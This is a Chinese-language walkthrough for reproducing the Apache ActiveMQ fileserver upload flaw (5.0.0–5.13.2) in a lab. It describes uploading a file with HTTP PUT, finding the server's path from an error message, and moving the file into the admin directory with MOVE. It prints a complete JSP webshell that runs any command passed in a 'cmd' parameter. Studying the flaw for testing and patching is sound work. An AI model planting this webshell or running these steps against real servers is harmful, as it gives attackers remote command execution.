Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。
1、描述
该漏洞出现在 fileserver 应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。
2、影响版本
Apache ActiveMQ 5.0.0 - 5.13.2
3、环境搭建
官网地址:http://activemq.apache.org/download-archives.html
下载版本:apache-activemq-5.7.0-bin.tar
下载到本地后解压,进入apache-activemq文件下bin目录,运行./activemq start
4、8161是ActiveMQ后台服务的管理端口,
61616是ActiveMQ服务端口。
5、使用浏览器访问8161端口,出现以下响应则环境搭建成功。
6、利用PUT方法上传jsp木马到目标的/fileserver/1.jsp,也可使用其他jsp木马。
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
7、访问上传的文件,以下响应为上传成功
8、输入错误路径,根据报错信息确认目标的绝对路径
9、确认路径后利用move方法将木马移动到目标的admin目录下
10、访问admin路径下jsp马,可获取权限。